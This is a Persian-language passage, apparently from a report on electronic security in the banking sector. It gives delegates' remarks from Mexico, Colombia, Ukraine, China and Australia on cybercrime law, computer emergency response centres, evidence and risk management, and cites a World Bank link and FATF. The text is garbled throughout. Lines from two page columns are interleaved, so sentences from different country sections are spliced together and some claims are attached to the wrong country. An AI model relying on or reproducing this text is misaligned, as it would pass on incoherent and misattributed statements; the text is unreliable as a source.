‫ﺹ ﻋﻤﻖ ﺧﻂﻣﺸﻲﻫﺎﻱ ﺳﻨﮕﺎﭘﻮﺭ ﺳﺆﺍﻝ ﻛﺮﺩ‪.‬‬
‫ﻣﻜﺰﻳﻚ ﺩﺭﺧﺼﻮ ﹺ‬
‫ﭘﺎﺳﺦ‬
‫ﺑﺪﻟﻴﻞ ﻣﻼﺣﻈﺎﺕ ﻗﻀﺎﻳﻲ‪ ،‬ﺣﺘﻲ ﺩﺭ ﺗﺸﺨﻴﺺ ﻣﺤﻞ ﻭﻗﻮﻉ ﺟـﺮﻡ‬ ‫ﭘﺎﺳﺦ‬
‫ﻧﻴﺰ ﻫﻤﻜﺎﺭﻱ ﻣﻴﺎﻥ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺿـﺮﻭﺭﻱ ﺍﺳـﺖ‪ .‬ﺑـﺮﺍﻱ‬ ‫ﺗﺠﺮﺑﻴﺎﺕ ﻛﻠﻲ ﺍﻣﻨﻴﺖ ﺩﺭ ﺳﻨﮕﺎﭘﻮﺭ ﺑﺼﻮﺭﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺩﺭ ﺩﺳﺘﺮﺱ‬
‫ﺁﻏﺎﺯ ﺑﺎﻳﺪ ﻳﻚ ﺯﺑﺎﻥ ﻣﺸﺘﺮﻙ ﺗﻮﺻـﻴﻒ ﻣـﺸﻜﻼﺕ‪ ،‬ﺭﺍﻫﻜﺎﺭﻫـﺎﻱ‬ ‫ﺍﺳﺖ‪ ٢٣٧.‬ﺍﻳﻦ ﺧﻂﻣﺸﻲﻫـﺎ ﺷـﺎﻣﻞ ‪ ۲۶‬ﻓﻌﺎﻟﻴـﺖ ﺩﺭ ﺣـﻮﺯﻩﻫـﺎﻱ‬
‫ﻼ‬
‫ﻛﺎﻫﺶ ﺁﻧﻬﺎ ﻭ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻓﺮﺍﺑﺨـﺸﻲ ﺗـﺪﻭﻳﻦ ﺷـﻮﻧﺪ‪ .‬ﻣـﺜ ﹰ‬ ‫ﺳﻴﺴﺘﻢﻋﺎﻣﻞ‪ ،‬ﻭﺻـﻠﻪﻫـﺎ‪ ،‬ﻧﻘـﺸﻬﺎ ﻭ ﻣـﺴﺌﻮﻟﻴﺘﻬﺎ‪ ،‬ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ‬
‫ﺗﻌﺮﻳﻒ "ﻛﻼﻫﺒﺮﺩﺍﺭﻱ" ﺩﺭ ﺍﺗﺤﺎﺩﻳﺔ ﺍﺭﻭﭘﺎ ﺑﺎ ﻣﺸﻜﻼﺗﻲ ﻫﻤﺮﺍﻩ ﺑﻮﺩ‪.‬‬ ‫ﺿﺪﻭﻳﺮﻭﺱ‪ ،‬ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ‪ ،‬ﻭ ﻏﻴﺮﻩ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﻳﻚ ﻧﻤﻮﻧﻪ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻓﺮﺍﺑﺨﺸﻲ ﻓﻌﺎﻝ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ‪ ،‬ﻛﻤﻴﺘـﺔ‬
‫ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﺎﻟﻲ )‪ ٢٣٨(FATF‬ﺍﺳﺖ ﻛﻪ ﺑﺎ ﭘﻮﻟـﺸﻮﻳﻲ ﻭ ﺗﺮﻭﺭﻳـﺴﻢ‬ ‫ﻛﻠﻤﺒﻴﺎ‬
‫ﻣﺒﺎﺭﺯﻩ ﻣﻲﻛﻨﺪ‪.‬‬ ‫ﻧﻤﺎﻳﻨﺪﺓ ﻛﻠﻤﺒﻴﺎ ﺑﻴﺎﻥ ﺩﺍﺷﺖ ﻛﻪ ﻣﺸﻜﻼﺕ ﺍﻳﻤﻨﻲ ﺁﻧﻬﺎ ﻣﺎﻧﻨﺪ ﺳﺎﻳﺮ‬
‫ﻛﺸﻮﺭﻫﺎ ﺍﺳﺖ ﻭ ﺁﻧﻬﺎ ﻧﻴﺰ ﺧﻮﺩ ﺭﺍ ﺁﺳﻴﺐﭘﺬﻳﺮ ﻣـﻲﺑﻴﻨﻨـﺪ‪ .‬ﺩﺭﺣـﺎﻝ‬
‫ﺍﻭﻛﺮﺍﻳﻦ‬
‫ﺣﺎﺿﺮ ﺍﻳﻦ ﻛﺸﻮﺭ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻱ ﺑﺮﺍﻱ ﻭﺍﻛﻨﺶ ﺑﻪ ﺭﺧﺪﺍﺩﻫﺎ ﻧﺪﺍﺭﺩ ﻭ‬
‫ﭘــﺲ ﺍﺯ ﺍﺳــﺘﻘﻼﻝ ﺍﻭﻛــﺮﺍﻳﻦ‪ ،‬ﺩﺭ ﺳﻴــﺴﺘﻢ ﺑــﺎﻧﻜﻲ ﺍﻳــﻦ ﻛــﺸﻮﺭ‬ ‫ﻣﺮﻛﺰ ﻓﻮﺭﻳﺘﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﻧﻴـﺰ ﺩﺭ ﺁﻥ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ ﻧـﺸﺪﻩ‬
‫ﺗﻐﻴﻴﺮﺍﺗﻲ ﺭﺥ ﺩﺍﺩ ﻭ ﺑﺎﻋﺚ ﺷﺪ ﺩﺭ ﺁﻥ ﺍﺯ ﻓﻨﺎﻭﺭﻳﻬـﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬ ‫ﺍﺳﺖ‪ .‬ﺳﺮﻭﻳﺲ ﮔﻴﺮﻧﺪﻩ ﻫﺎ ﻱ ﻛﻠﻤﺒﻴﺎﻳﻲ ﻣﺴﺘﻌﺪ ﻫﺴﺘﻨﺪﻛﻪ ﻗﺮﺑـﺎﻧﻲ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺷﻮﺩ‪ .‬ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﺜـﻞ ﺍﻣـﻀﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻭ‬ ‫ﺣﻤﻼﺕ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻧﺪ‪ ،‬ﺳـﺮﻗﺖ ﻫﻮﻳـﺖ ﺩﺭﺣـﺎﻝ ﺍﻓـﺰﺍﻳﺶ ﺍﺳـﺖ‪،‬‬
‫ﺭﻣﺰﻧﮕــﺎﺭﻱ ﺗﻮﺳــﻂ ﺑﺎﻧــﻚ ﻣﻠــﻲ ﺍﺩﺍﺭﻩ ﻣــﻲﺷــﻮﻧﺪ‪ ٢٣٩.‬ﺍﺯ ﺯﻣــﺎﻥ‬ ‫ﻛﺎﺭﺗﻬــﺎﻱ ﺑــﺎﻧﻜﻲ ﺟﻌــﻞ ﻣــﻲﺷــﻮﻧﺪ‪ ،‬ﻗــﺎﻧﻮﻧﻲ ﺑــﺮﺍﻱ ﺗــﻀﻤﻴﻦ‬
‫ﺍﺳﺘﻘﻼﻝ ﺍﻳﻦ ﻛﺸﻮﺭ‪ ،‬ﻗﻮﺍﻧﻴﻦ ﺍﻣﻀﺎ ﻭ ﻣﻌﺎﻣﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﻪ‬ ‫ﻣﺤﺮﻣﺎﻧﮕﻲ ﻭﺟﻮﺩ ﻧـﺪﺍﺭﺩ‪ ،‬ﻛـﺎﻫﺶ ﻣﺨـﺎﻃﺮﺍﺕ ﺗﻨﻬـﺎ ﺑـﺮ ﻋﻬـﺪﺓ‬
‫ﺍﺟﺮﺍ ﺩﺭ ﺁﻣﺪﻩﺍﻧﺪ‪ .‬ﻋﻠﻴﺮﻏﻢ ﺑﺮﺧﻲ ﺗﻼﺷﻬﺎ ﺑﺮﺍﻱ ﻧﻔﻮﺫ ﺑـﻪ ﺳﻴـﺴﺘﻢ‬ ‫ﻣﻤﻴﺰﻫﺎ ﺍﺳﺖ‪ PKI ،‬ﻭ ﻛﺎﺭﺗﻬﺎﻱ ﻫﻮﺷـﻤﻨﺪ ﺑﻜـﺎﺭ ﻣـﻲﺭﻭﻧـﺪ ﺍﻣـﺎ‬
‫ﺑﺎﻧﻜﻲ‪ ،‬ﺗﺎﻛﻨﻮﻥ ﺧﺴﺎﺭﺕ ﺧﺎﺻﻲ ﮔﺰﺍﺭﺵ ﻧﺸﺪﻩ ﺍﺳﺖ‪.‬‬ ‫ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎﻧﻜﻬﺎ ﺩﺭ ﺣـﺪ ﻣﻘـﺪﻣﺎﺗﻲ ﺍﺳـﺖ‪ ،‬ﻛﺎﺭﻣﻨـﺪﺍﻥ‬
‫ﺩﺭ ﺣﻮﺯﺓ ﻗﻮﺍﻧﻴﻦ‪ ،‬ﺍﻭﻛﺮﺍﻳﻦ ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۱‬ﻣﻌﺎﻫﺪﺓ ﺟﺮﺍﺋﻢ ﺳـﺎﻳﺒﺮ‬ ‫ﻻ ﺑﻪ ﺩﺳﺘﻮﺭﺍﺕ ﺍﻳﻤﻨﻲ ﺑﻲﺗـﻮﺟﻬﻲ ﻣـﻲﻛﻨﻨـﺪ ﻭ ﺍﻣﻨﻴـﺖ ﺩﺭ‬ ‫ﻣﻌﻤﻮ ﹰ‬
‫ﺭﺍ ﺍﻣﻀﺎ ﻛﺮﺩ ﻭ ﺍﺯ ﺁﻥ ﭘﺲ ﺑﻪ ﺗﻌﻘﻴﺐ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ‬ ‫ﻓﺮﻫﻨﮓ ﺑﺎﻧﻜﻲ ﻛﻠﻤﺒﻴﺎ ﺩﺭ ﺟﺎﻳﮕﺎﻩ ﺻـﺤﻴﺢ ﺧـﻮﺩ ﻗـﺮﺍﺭ ﻧـﺪﺍﺭﺩ‪ ،‬ﻭ‬
‫ﻋﻼﻭﻩ ﺑﺮ ﻫﻤﺔ ﺍﻳﻨﻬﺎ ﺩﺭ ﺍﻳﻦ ﻛﺸﻮﺭ ﺑﻪﺭﻭﺯ ﻣﺎﻧﺪﻥ ﻧﻴﺰ ﻳﻚ ﻣﺸﻜﻞ‬
‫ﭘﺮﺩﺍﺧﺖ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﭘﺎﺭﻟﻤﺎﻥ ﺁﻥ ﻛﺸﻮﺭ ﻳﻚ ﻗﺎﻧﻮﻥ ﺩﺭ ﺯﻣﻴﻨـﺔ‬
‫ﺍﺳﺎﺳﻲ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ ﺑﻪ ﺗﺼﻮﻳﺐ ﺭﺳﺎﻧﺪﻩ ﺍﺳﺖ‪ .‬ﺩﺭ ﻣﺘﻦ‬
‫ﻗﻮﺍﻧﻴﻦ ﺟﻨﺎﻳﻲ ﺑﻪ ﺟﺮﺍﺋﻢ ﺳﺎﻳﺒﺮ ﻧﻴﺰ ﺗﻮﺟﻪ ﺷﺪﻩ‪ ،‬ﺍﻣﺎ ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﻳﻦ‬ ‫ﺑﺪﻳﻬﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ ﻣﺆﺳـﺴﺎﺕ ﭼﻨﺪﺟﺎﻧﺒـﻪ ﻧﻘـﺸﻲ‬
‫ﻗﻮﺍﻧﻴﻦ ﺗﺄﺛﻴﺮ ﻛﻤﻲ ﺑﺮ ﺟﺎﻱ ﻣﻲﮔﺬﺍﺭﻧﺪ‪ ،‬ﭼﺮﺍﻛﻪ ﺑﺮﺍﻱ ﺍﻋﻤﺎﻝ ﺁﻧﻬـﺎ‬ ‫ﺍﺳﺎﺳــﻲ ﺩﺍﺭﻧــﺪ‪ .‬ﺑﻌﻨــﻮﺍﻥ ﻣﺜــﺎﻝ ‪ UNCITRAL‬ﺑــﺮﺍﻱ ﺟــﺮﺍﺋﻢ‬
‫ﺍﺑﺘﺪﺍ ﺑﺎﻳﺪ ﻋﺎﻣﻞ "ﻋﻤﺪ" ﻭ "ﻗﺼﺪ" ﺩﺭ ﺍﺭﺗﻜﺎﺏ ﺟﺮﻡ ﺑﻪ ﺍﺛﺒﺎﺕ ﺑﺮﺳﺪ‪.‬‬ ‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺭ ﺣﻮﺯﻩﻫﺎﻳﻲ ﭼﻮﻥ ﺁﺯﺍﺭ ﻭ ﺍﺫﻳﺖ‪ ،‬ﺗﺨﺮﻳﺐ ﺳـﺮﻭﻳﺲ‪ ،‬ﻭ‬
‫ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺍﻳﻦ ﻣـﻮﺍﺭﺩ‪ ،‬ﺗﻌﻘﻴـﺐ ﻧﺎﻛـﺎﻓﻲ ﺟـﺮﺍﺋﻢ ﺑـﻪ ﻳـﻚ ﺭﻭﺍﻝ‬ ‫ﻫﻤﭽﻨﻴﻦ ﻣﻌﺎﻣﻼﺕ‪ ،‬ﻳﻚ ﻗﺎﻧﻮﻥ ﻣﺮﺟﻊ ﺩﺍﺭﺩ‪ .‬ﺧﺼﻮﺻﻴﺖ ﻗـﻮﺍﻧﻴﻦ‬
‫ﺭﻭﺯﻣﺮﻩ ﺑﺪﻝ ﺷﺪﻩ‪ ،‬ﭼﻮﻥ ﺍﺭﺍﺋﻪ ﻣﺪﺍﺭﻙ ﻣﺤﻜﻤﻪﭘﺴﻨﺪ ﺑﺮﺍﻱ ﺍﺛﺒـﺎﺕ‬ ‫ﻣﺮﺟﻊ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺑﺮﺧﻼﻑ ﻗـﻮﺍﻧﻴﻦ ﻋـﺎﺩﻱ ﺑﺎﻳـﺪ ﻣﺒﺘﻨـﻲ ﺑـﺮ‬
‫ﺗﻌﻤﺪﻱ ﺑﻮﺩﻥ ﭼﻨﻴﻦ ﺟﺮﺍﺋﻤﻲ ﻭﺍﻗﻌﹰﺎ ﺩﺷﻮﺍﺭ ﺍﺳﺖ‪ .‬ﻛﺎﺭﻛﻨﺎﻥ ﺑﺨﺶ‬ ‫ﻗﻮﺍﻧﻴﻦ ﻣﺪﻧﻲ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﺍﻣﻨﻴﺖ ﻧﻴﺮﻭﻫﺎﻱ ﺍﻧﺘﻈـﺎﻣﻲ ﺑﺎﻳـﺪ ﺩﺭ ﺯﻣﻴﻨـﺔ ﺟﻤـﻊﺁﻭﺭﻱ ﻣـﺪﺍﺭﻙ‬
‫ﺍﺛﺒﺎﺕ ﺟﺮﻡ ﺁﻣﻮﺯﺵ ﻛﺎﻓﻲ ﺑﺒﻴﻨﻨﺪ‪.‬‬ ‫ﭘﺮﺳﺶ‬
‫ﻧﻤﺎﻳﻨﺪﺓ ﻛﻠﻤﺒﻴﺎ ﭘﺮﺳﻴﺪ ﻛﻪ ﺟﺎﻣﻌﻴﺖ ﺍﻣﻨﻴﺖ ﺩﺭ ﻣﺆﺳـﺴﺎﺕ ﻣـﺎﻟﻲ‪،‬‬
‫ﭘﺮﺳﺶ‬ ‫ﺑﺨﺼﻮﺹ ﺑﺎ ﻣﻼﺣﻈﺎﺕ ﺳﻮﺩ ﻭ ﺯﻳﺎﻥ‪ ،‬ﭼﻄﻮﺭ ﺯﻳﺮ ﺳﺆﺍﻝ ﻣـﻲﺭﻭﺩ‪.‬‬
‫ﺳﺌﻮﺍﻝ ﺍﺻﻠﻲ ﺍﻭﻛﺮﺍﻳﻦ ﺩﺭ ﻣﻮﺭﺩ ﺑﺮﺁﻭﺭﺩﻥ ﻣـﺴﺌﻮﻟﻴﺖ ﻭ ﺗﻌﻬـﺪ ﺑـﺎ‬ ‫ﻣﺴﺎﺋﻠﻲ ﭼـﻮﻥ ﻣـﺴﺌﻮﻟﻴﺖ ﻭ ﻣـﺪﻳﺮﻳﺖ ﻣﺨـﺎﻃﺮﺍﺕ‪ ،‬ﻧﮕﺮﺍﻧﻴﻬـﺎﻱ‬

‫‪238 Financial Action Task Force‬‬ ‫‪237 http://wbln0018.worldbank.org/ html/Financial‬‬


‫‪ ۲۳۹‬ﺩﺭ ﺍﻳﻦ ﻛﺸﻮﺭ ﺗﻤﺎﻡ ﺑﺎﻧﻜﻬﺎ ﺟﺰﺋﻲ ﺍﺯ ﺳﻴﺴﺘﻢ ﺑﺎﻧﻚ ﻣﻠﻲ ﻣﺤﺴﻮﺏ ﻣـﻲ‪-‬‬ ‫‪SectorWeb.nsf/(attachmentweb)/Singpore_TR‬‬
‫‪Mguidelines28Feb03/$FILE/Singpore_TRMgu‬‬
‫ﺷﻮﻧﺪ‪.‬‬ ‫‪idelines28Feb0‬‬
‫‪٢٢٥‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫‪ APEC‬ﺑﻪ ﻓﻨـﺎﻭﺭﻱ ﺑـﻲﺳـﻴﻢ ﻧﻴـﺰ ﺧﻮﺍﻫـﺪ ﭘﺮﺩﺍﺧـﺖ ﻭ ﺑﻄـﻮﺭ‬ ‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﻧﻈﺎﺭﺕ ﺩﺍﺧﻠﻲ ﻭ ﮔـﺰﺍﺭﺵ ﺑـﻮﺩ‪ .‬ﺑﻌﻨـﻮﺍﻥ‬
‫ﺧﻼﺻﻪ ﺑﻪ ﻣﺨﺎﻃﺮﺍﺕ ﻓﻨﺎﻭﺭﻳﻬﺎﻳﻲ ﭼﻮﻥ ‪ Wi-Fi‬ﻫﻢ ﻣﻲﭘﺮﺩﺍﺯﺩ‪.‬‬ ‫ﻧﻤﻮﻧﻪ‪ ،‬ﮔﺰﺍﺭﺵ ﺭﻭﻳﺪﺍﺩ ﻫﺎ ﺗﻮﺳﻂ ﻣﺄﻣﻮﺭﺍﻥ ﺑـﺎﻧﻜﻲ ﺑـﺮﺍﻱ ﺍﻳﻤﻨـﻲ‬
‫ﺑﺎﻧﻚ ﺿﺮﻭﺭﻱ ﺍﺳﺖ‪ .‬ﺑﺮﺍﻱ ﻛﻤﻚ ﺑـﻪ ﻇﺮﻓﻴﺘﻬـﺎﻱ ﻭﺍﻛـﻨﺶ ﺑـﻪ‬
‫ﺳﻮﻡ‪ ،‬ﺗﺎ ﺁﺧﺮ ﺍﻛﺘﺒﺮ ‪ ۲۰۰۳‬ﺩﺭ ﺗﻤـﺎﻡ ﻛـﺸﻮﺭﻫﺎﻱ ﻋـﻀﻮ ‪APEC‬‬
‫ﺭﺧﺪﺍﺩﻫﺎ‪ ،‬ﻳﻚ ﻣﺮﻛﺰ ﻓﻮﺭﻳﺘﻬـﺎﻱ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺩﺭ ﺍﻭﻛـﺮﺍﻳﻦ‬
‫ﻣﺮﺍﻛﺰ ﻓﻮﺭﻳﺘﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺗﺸﻜﻴﻞ ﺧﻮﺍﻫﺪ ﺷﺪ‪.‬‬
‫ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﭼﻴﻦ‪ ،‬ﭘﻜﻦ‬
‫ﭘﺎﺳﺦ‬
‫ﻧﻤﺎﻳﻨﺪﺓ ﭼﻴﻦ ﺑﻴـﺎﻥ ﺩﺍﺷـﺖ ﻛـﻪ ﺁﮔـﺎﻫﻲ ﻋﻤـﻮﻣﻲ ﺩﺭﺧـﺼﻮﺹ‬ ‫ﺩﺭ ﻣﻮﺭﺩ ﻣﺪﺍﺭﻙ ﻣﺤﻜﻤﻪﭘﺴﻨﺪ‪ ،‬ﺑﻪ ﺍﻳـﻦ ﻧﻜﺘـﻪ ﺍﺷـﺎﺭﻩ ﺷـﺪ ﻛـﻪ‬
‫ﺟﺎﻳﮕﺎﻩ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎﻳﺪ ﺍﻓﺰﺍﻳﺶ ﻳﺎﺑﺪ ﻭ ﺑﺮﺍﻱ ﻧﻴﻞ ﺑﻪ ﺍﻳﻦ‬ ‫ﺩﺍﺩﻩﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﻣﻌﺮﺽ ﻧـﺎﺑﻮﺩﻱ ﺳـﺮﻳﻊ ﻫـﺴﺘﻨﺪ ﻭ ﺩﺭ‬
‫ﻣﻘﺼﻮﺩ ﺍﺭﺯﻳﺎﺑﻴﻬﺎﻱ ﺧﺎﺭﺟﻲ ﺑﻴﺸﺘﺮﻱ ﻣﻮﺭﺩ ﻧﻴـﺎﺯ ﺍﺳـﺖ‪ .‬ﻳﻜـﻲ ﺍﺯ‬ ‫ﺣﻮﺯﺓ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻧﻴﺰ ﻫﻴﭻ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻱ ﺑﺮﺍﻱ ﻣﺪﺍﺭﻙ ﻗﺎﻧﻮﻧﻲ‬
‫ﻋﻤﺪﺓ ﻣﺸﻜﻼﺗﻲ ﻛﻪ ﭼﻴﻦ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﺎ ﺁﻥ‬ ‫ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ‪ .‬ﺑﺎ ﺍﻳﻨﻜﻪ ﺩﻧﻴﺎ ﻧﻴﺎﺯﻣﻨﺪ ﺭﺍﻫﺒﺮﺩﻫﺎﻳﻲ ﺑﺮﺍﻱ ﭘﻴﮕﺮﺩﻫـﺎﻱ‬
‫ﻣﻮﺍﺟﻪ ﻣﻲﺑﺎﺷﺪ ﻓﻘﺪﺍﻥ ﺁﮔﺎﻫﻲ ﻭ ﺗﻮﺍﻧﺎﻳﻲ ﻣﺪﻳﺮﻳﺘﻲ ﺑﺮﺍﻱ ﺍﺭﺯﻳـﺎﺑﻲ‬ ‫ﻗــﺎﻧﻮﻧﻲ ﺑــﺼﻮﺭﺕ ﺩﻳﺠﻴﺘــﺎﻝ ﺍﺳــﺖ‪ ،‬ﺍﻣــﺎ ﺩﺭﺣــﺎﻝ ﺣﺎﺿــﺮ ﺭﻭﺵ‬
‫ﻣﺨﺎﻃﺮﺍﺕ )ﺑﺨﺼﻮﺹ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﻣﺎﻫﻴﺖ ﭘﻴﭽﻴﺪﺓ ﻓﻨﺎﻭﺭﻳﻬﺎ( ﺍﺳﺖ‪ .‬ﺍﻳـﻦ‬ ‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻱ ﻛﻪ ﻣﻮﺭﺩ ﺗﺄﻳﻴﺪ ﺩﺍﺩﮔﺎﻫﻬﺎ ﺑﺎﺷﺪ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ‪.‬‬
‫ﻣﺸﻜﻞ ﺩﺭ ﻛﺸﻮﺭ ﭼﻴﻦ ﺑﺪﻟﻴﻞ ﻫﻤﻜـﺎﺭﻱ ﺿـﻌﻴﻒ ﻣﻴـﺎﻥ ﻣﺮﺍﻛـﺰ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ ﻭ ﻣﺮﺍﻛﺰ ﻧﻈﺎﺭﺗﻲ ﺗﺸﺪﻳﺪ ﻫﻢ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬ ‫ﺍﺳﺘﺮﺍﻟﻴﺎ‬

‫ﻋﻠﻴﺮﻏﻢ ﺍﻭﺿﺎﻉ ﻧﺎﻣﺴﺎﻋﺪ ﺍﻣﻨﻴﺘـﻲ‪ ،‬ﺑﺎﻧﻜﻬـﺎﻱ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﺩﺭ ﭼـﻴﻦ‬ ‫ﺍﺳﺘﺮﺍﻟﻴﺎ ﺟﻬﺖ ﻃﺒﻘﻪﺑﻨﺪﻱ ﺍﻃﻼﻋﺎﺕ‪ BASEL2 ،‬ﺭﺍ ﺍﻧﺘﺨـﺎﺏ ﻭ‬
‫ﺑﺴﺮﻋﺖ ﺩﺭﺣﺎﻝ ﺭﺷـﺪ ﻫـﺴﺘﻨﺪ‪ .‬ﺗﻌـﺪﺍﺩ ﺍﻳـﻦ ﺑﺎﻧﻜﻬـﺎ ﺩﺭ ﺧـﻼﻝ‬ ‫ﭘﻴﺎﺩﻩ ﺳﺎﺯﻱ ﻛﺮﺩﻩ ﺍﺳﺖ‪ .‬ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺁﻧﻬﺎ ﺩﺭﻳﺎﻓﺘﻪﺍﻧﺪ ﻛـﻪ ﺍﺳـﺘﻔﺎﺩﺓ‬
‫ﺭﻭﺯﺍﻓﺰﻭﻥ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻬﺎﺟﻢﻳﺎﺏ ﺑـﺎ ﺍﻳﻨﻬﻤـﻪ ﺗﺸﺨﻴـﺼﻬﺎﻱ‬
‫ﺳﺎﻟﻬﺎﻱ ‪ ۱۹۹۹‬ﺗﺎ ‪ ۲۰۰۳‬ﺍﺯ ﻳﻚ ﺑﻪ ﺑﻴﺴﺖ ﻭ ﻫﻔﺖ ﺭﺳﻴﺪﻩ ﻭ ﻧﻴﺰ‬
‫ﻣﺜﺒﺖ ﻧﺎﺻﺤﻴﺢ )‪ (false positive‬ﻭ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺗﻨﻈـﻴﻢﻧـﺸﺪﻩ‬
‫ﺣﺠﻢ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺑﺎﻧﻜﻲ ﺑﻴﺶ ﺍﺯ ‪ ۱۰۰‬ﺑﺮﺍﺑﺮ ﺭﺷﺪ ﺩﺍﺷﺘﻪ ﺍﺳﺖ‪ .‬ﺑﻪ‬
‫ﭼﻨﺪﺍﻥ ﺁﺳﺎﻥ ﻧﻴﺴﺖ‪ .‬ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺟﺪﻳـﺪ ﺑـﺮ ﻣﺒﻨـﺎﻱ ﻓﻨﺎﻭﺭﻳﻬـﺎﻱ‬
‫ﺍﻳﻦ ﻧﻜﺘﻪ ﺍﺷـﺎﺭﻩ ﺷـﺪ ﻛـﻪ ﺩﺭ ﺯﻣـﺎﻥ ﺷـﻴﻮﻉ ﺑﻴﻤـﺎﺭﻱ ﺳـﺎﺭﺱ‪،‬‬
‫ﭘﻴﺸﻴﻦ ﺳﺎﺧﺘﻪ ﻣـﻲ ﺷـﻮﻧﺪ‪ ،‬ﻭ ﺍﻳـﻦ ﺑـﻪ ﭘﻴﭽﻴـﺪﮔﻲ ﻭ ﻭﺍﺑـﺴﺘﮕﻲ‬
‫ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺭﻭﻧﻖ ﺯﻳﺎﺩﻱ ﭘﻴﺪﺍ ﻛﺮﺩ‪ .‬ﻧﻬﺎﻳﺘـﹰﺎ ﻛـﺸﻮﺭ ﭼـﻴﻦ‬
‫ﺳﻴﺴﺘﻤﻬﺎ ﺑﻪ ﻳﻜﺪﻳﮕﺮ ﺩﺍﻣﻦ ﻣﻲ ﺯﻧﺪ‪ .‬ﺩﺭ ﻫﻤﻴﻨﺤﺎﻝ ﻣﻤﻜﻦ ﺍﺳـﺖ‬
‫ﭘﻴﺸﻨﻬﺎﺩﻫﺎﻱ ﺯﻳﺮ ﺭﺍ ﺍﺭﺍﺋﻪ ﺩﺍﺩ‪:‬‬
‫ﻧﺤﻮﺓ ﻛﺎﺭ ﺳﻴﺴﺘﻤﻬﺎ ﻧﻴﺰ ﺑﻪ ﺧﻮﺑﻲ ﻣـﺴﺘﻨﺪ ﺳـﺎﺯﻱ ﻧـﺸﺪﻩ ﺑﺎﺷـﺪ‪.‬‬
‫ﺗﺸﻮﻳﻖ ﺍﺷﺘﺮﺍﻙ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺳﻄﻮﺡ ﻣﻠﻲ ﻭ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ‬ ‫‪.۱‬‬ ‫ﻲ ﻭﺍﺑـﺴﺘﮕﻲ ﺳﻴـﺴﺘﻤﻬﺎ ﺑـﻪ ﻳﻜـﺪﻳﮕﺮ‬ ‫ﻳﺎﺩﮔﻴﺮﻱ ﺩﺭ ﻣﻮﺭﺩ ﭼﮕﻮﻧﮕ ﹺ‬
